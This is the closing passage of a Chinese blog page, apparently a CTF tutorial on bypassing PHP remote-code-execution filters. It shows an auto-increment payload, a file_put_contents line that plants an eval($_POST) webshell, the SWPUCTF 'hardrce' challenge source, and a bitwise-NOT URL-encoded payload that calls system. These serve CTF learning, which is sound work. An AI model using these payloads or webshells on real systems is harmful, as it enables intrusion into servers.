class="number">27</span>%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24_%3d%<span class="number">24</span>%24____%3b%24___(%24_%5b_%5d)%3b</span><br></pre></td></tr></table></figure>

<p>搜索disable_functions，我们可以找到被禁用的函数</p>
<p><img src="/img/1722310534826-23.png" alt="img"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,<span class="built_in">exec</span>,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dlpc</span><br></pre></td></tr></table></figure>

<p>Payload:</p>
<p>_&#x3D;file_put_contents(‘1.php’,’<?php eval($_POST['aa']);?>‘);</p>
<p>通过写入一句话木马，蚁剑连接，得flag。</p>
<h5 id="取反绕过"><a href="#取反绕过" class="headerlink" title="取反绕过"></a>取反绕过</h5><p><strong>对所要执行的命令进行取反即可</strong></p>
<p><strong>[SWPUCTF 2021 新生赛]hardrce</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">header(<span class="string">&quot;Content-Type:text/html;charset=utf-8&quot;</span>); </span><br><span class="line">error_reporting(<span class="number">0</span>); </span><br><span class="line">highlight_file(__FILE__); </span><br><span class="line"><span class="keyword">if</span>(isset($_GET[<span class="string">&#x27;wllm&#x27;</span>])) </span><br><span class="line">&#123; </span><br><span class="line">    $wllm = $_GET[<span class="string">&#x27;wllm&#x27;</span>]; </span><br><span class="line">    $blacklist = [<span class="string">&#x27; &#x27;</span>,<span class="string">&#x27;\t&#x27;</span>,<span class="string">&#x27;\r&#x27;</span>,<span class="string">&#x27;\n&#x27;</span>,<span class="string">&#x27;\+&#x27;</span>,<span class="string">&#x27;\[&#x27;</span>,<span class="string">&#x27;\^&#x27;</span>,<span class="string">&#x27;\]&#x27;</span>,<span class="string">&#x27;\&quot;&#x27;</span>,<span class="string">&#x27;\-&#x27;</span>,<span class="string">&#x27;\$&#x27;</span>,<span class="string">&#x27;\*&#x27;</span>,<span class="string">&#x27;\?&#x27;</span>,<span class="string">&#x27;\&lt;&#x27;</span>,<span class="string">&#x27;\&gt;&#x27;</span>,<span class="string">&#x27;\=&#x27;</span>,<span class="string">&#x27;\`&#x27;</span>,]; </span><br><span class="line">    foreach ($blacklist <span class="keyword">as</span> $blackitem) </span><br><span class="line">    &#123; </span><br><span class="line">        <span class="keyword">if</span> (preg_match(<span class="string">&#x27;/&#x27;</span> . $blackitem . <span class="string">&#x27;/m&#x27;</span>, $wllm)) &#123; </span><br><span class="line">        die(<span class="string">&quot;LTLT说不能用这些奇奇怪怪的符号哦！&quot;</span>); </span><br><span class="line">    &#125;&#125; </span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/[a-zA-Z]/is&#x27;</span>,$wllm)) </span><br><span class="line">&#123; </span><br><span class="line">    die(<span class="string">&quot;Ra&#x27;s Al Ghul说不能用字母哦！&quot;</span>); </span><br><span class="line">&#125; </span><br><span class="line">echo <span class="string">&quot;NoVic4说：不错哦小伙子，可你能拿到flag吗？&quot;</span>; </span><br><span class="line"><span class="built_in">eval</span>($wllm); </span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">else</span> </span><br><span class="line">&#123; </span><br><span class="line">    echo <span class="string">&quot;蔡总说：注意审题！！！&quot;</span>; </span><br><span class="line">&#125; </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/EddieMurphy-blogs/p/17747410.html">无字母rce</a>：字母被过滤了，且设置了一个黑名单过滤了许多东西</p>
<p>涉及知识点：取反绕过</p>
<p>url编码取反绕过 ：就是我们将php代码url编码后取反，我们传入参数后服务端进行url解码，这时由于取反后，会url解码成不可打印字符，这样我们就会绕过</p>
<p>payload:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo urlencode(~<span class="string">&#x27;system&#x27;</span>);</span><br><span class="line">echo <span class="string">&quot;\n&quot;</span>;</span><br><span class="line">echo urlencode(~<span class="string">&#x27;ls /&#x27;</span>);<span class="comment">#ls / -&gt; cat /flag</span></span><br><span class="line">?&gt;</span><br><span class="line"><span class="comment">#%8C%86%8C%8B%9A%92</span></span><br><span class="line"><span class="comment">#%93%8C%DF%D0</span></span><br><span class="line"><span class="comment">#payload:~(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);记住结尾要加分号</span></span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="entry-meta entry-footer">
      
	<span class="ico-folder"></span>
    <a class="article-category-link" href="/categories/web/">web</a>

      
      
        
	<div id="comment">
		<!-- 来必力City版安装代码 -->
		<div id="lv-container" data-id="city" data-uid="MTAyMC8yOTQ4MS82MDQ5">
		<script type="text/javascript">
		   (function(d, s) {
		       var j, e = d.getElementsByTagName(s)[0];

		       if (typeof LivereTower === 'function') { return; }

		       j = d.createElement(s);
		       j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
		       j.async = true;

		       e.parentNode.insertBefore(j, e);
		   })(document, 'script');
		</script>
		<noscript>为正常使用来必力评论功能请激活JavaScript</noscript>
		</div>
		<!-- City版安装代码已完成 -->
	</div>



      
    </footer>
    <hr class="entry-footer-hr">
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/08/01/kali%E9%85%8D%E7%BD%AE%E7%BD%91%E7%BB%9C/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          kali配置网络
        
      </div>
    </a>
  
  
    <a href="/2024/07/23/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">文件包含</div>
    </a>
  
</nav>

  
</article>

<!-- Table of Contents -->

  <aside id="sidebar">
    <div id="toc" class="toc-article">
    <strong class="toc-title">Contents</strong>
    
      <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0"><span class="nav-number">1.</span> <span class="nav-text">常见危险函数</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#system"><span class="nav-number">1.1.</span> <span class="nav-text">system</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Passthru"><span class="nav-number">1.2.</span> <span class="nav-text">Passthru</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#shell-exec"><span class="nav-number">1.3.</span> <span class="nav-text">shell_exec</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BC%95%E5%8F%B7"><span class="nav-number">1.4.</span> <span class="nav-text">反引号</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#popen"><span class="nav-number">1.5.</span> <span class="nav-text">popen</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#proc-open"><span class="nav-number">1.6.</span> <span class="nav-text">proc_open</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F"><span class="nav-number">2.</span> <span class="nav-text">绕过方式</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%A9%BA%E6%A0%BC%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-number">2.1.</span> <span class="nav-text">空格过滤绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98"><span class="nav-number">2.1.1.</span> <span class="nav-text">例题</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%90%8D%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-number">2.2.</span> <span class="nav-text">文件名过滤绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%97%A0%E5%9B%9E%E6%98%BE%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="nav-number">2.3.</span> <span class="nav-text">无回显时间盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%91%BD%E4%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-number">2.4.</span> <span class="nav-text">常见文件读取命令绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="nav-number">2.5.</span> <span class="nav-text">编码绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6%E7%BB%95%E8%BF%87"><span class="nav-number">2.6.</span> <span class="nav-text">长度限制绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%95%BF%E5%BA%A6%E4%B8%BA7%E7%BB%95%E8%BF%87"><span class="nav-number">2.6.1.</span> <span class="nav-text">长度为7绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%95%BF%E5%BA%A6%E4%B8%BA5%E7%BB%95%E8%BF%87"><span class="nav-number">2.6.2.</span> <span class="nav-text">长度为5绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%95%BF%E5%BA%A6%E4%B8%BA4%E7%BB%95%E8%BF%87"><span class="nav-number">2.6.3.</span> <span class="nav-text">长度为4绕过</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%97%A0%E5%8F%82%E6%95%B0RCE%E7%BB%95%E8%BF%87"><span class="nav-number">2.7.</span> <span class="nav-text">无参数RCE绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#scandir-%E8%AF%BB%E5%8F%96"><span class="nav-number">2.7.1.</span> <span class="nav-text">scandir()读取</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#session-id-%E8%AF%BB%E5%8F%96"><span class="nav-number">2.7.2.</span> <span class="nav-text">session_id()读取</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#hex2bin%EF%BC%88%EF%BC%89%E8%AF%BB%E5%8F%96"><span class="nav-number">2.7.2.1.</span> <span class="nav-text">hex2bin（）读取</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#%E7%9B%B4%E6%8E%A5%E8%AF%BB%E5%8F%96"><span class="nav-number">2.7.2.2.</span> <span class="nav-text">直接读取</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#getallheaders-%E8%AF%BB%E5%8F%96"><span class="nav-number">2.7.3.</span> <span class="nav-text">getallheaders()读取</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#get-defined-vars-%E8%AF%BB%E5%8F%96"><span class="nav-number">2.7.4.</span> <span class="nav-text">get_defined_vars()读取</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#chdir-array-rand-%E8%AF%BB%E5%8F%96"><span class="nav-number">2.7.5.</span> <span class="nav-text">chdir()&amp;array_rand()读取</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%97%A0%E5%AD%97%E6%AF%8D%E6%95%B0%E5%AD%97%E7%9A%84%E7%BB%95%E8%BF%87"><span class="nav-number">2.8.</span> <span class="nav-text">无字母数字的绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%BC%82%E6%88%96%E7%BB%95%E8%BF%87"><span class="nav-number">2.8.1.</span> <span class="nav-text">异或绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E8%87%AA%E5%A2%9E%E7%BB%95%E8%BF%87"><span class="nav-number">2.8.2.</span> <span class="nav-text">自增绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8F%96%E5%8F%8D%E7%BB%95%E8%BF%87"><span class="nav-number">2.8.3.</span> <span class="nav-text">取反绕过</span></a></li></ol></li></ol></li></ol>
    
    </div>
  </aside>
</section>
        
      </div>

    </div>
    <!-- <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
    <a href="/categories" class="mobile-nav-link">Categories</a>
  
    <a href="/tags" class="mobile-nav-link">Tags</a>
  
    <a href="/about" class="mobile-nav-link">About</a>
  
</nav> -->
    <footer id="footer" class="site-footer">
  

  <div class="clearfix container">
      <div class="site-info">
	      &copy; 2024 jothon&#39;s blog All Rights Reserved.
        
            <span id="busuanzi_container_site_uv">
              本站访客数<span id="busuanzi_value_site_uv"></span>人次  
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
            </span>
          
      </div>
      <div class="site-credit">
        Theme by <a href="https://github.com/iTimeTraveler/hexo-theme-hipaper" target="_blank">hipaper</a>
      </div>
  </div>
</footer>


<!-- min height -->

<script>
    var wrapdiv = document.getElementById("wrap");
    var contentdiv = document.getElementById("content");

    wrapdiv.style.minHeight = document.body.offsetHeight - document.getElementById("allheader").offsetHeight - document.getElementById("footer").offsetHeight + "px";
    contentdiv.style.minHeight = document.body.offsetHeight - document.getElementById("allheader").offsetHeight - document.getElementById("footer").offsetHeight + "px";


    <!-- headerblur min height -->
    
      var headerblur = document.getElementById("header-blur");
      headerblur.style.minHeight = window.getComputedStyle(document.getElementById("allheader"), null).height;
    
    
</script>
    
<div style="display: none;">
  <script src="https://s11.cnzz.com/z_stat.php?id=1260716016&web_id=1260716016" language="JavaScript"></script>
</div>

<!-- mathjax config similar to math.stackexchange -->

<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$','$'], ["\\(","\\)"] ],
      processEscapes: true
    }
  });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>

<script type="text/javascript" src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>


<script src="/js/bootstrap.js"></script>


<script src="/js/main.js"></script>








  <div style="display: none;">
    <script src="https://s95.cnzz.com/z_stat.php?id=1260716016&web_id=1260716016" language="JavaScript"></script>
  </div>



	<script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
	</script>






  </div>

  <a id="rocket" href="#top" class=""></a>
  <script type="text/javascript" src="/js/totop.js" async=""></script>
</body>
</html>
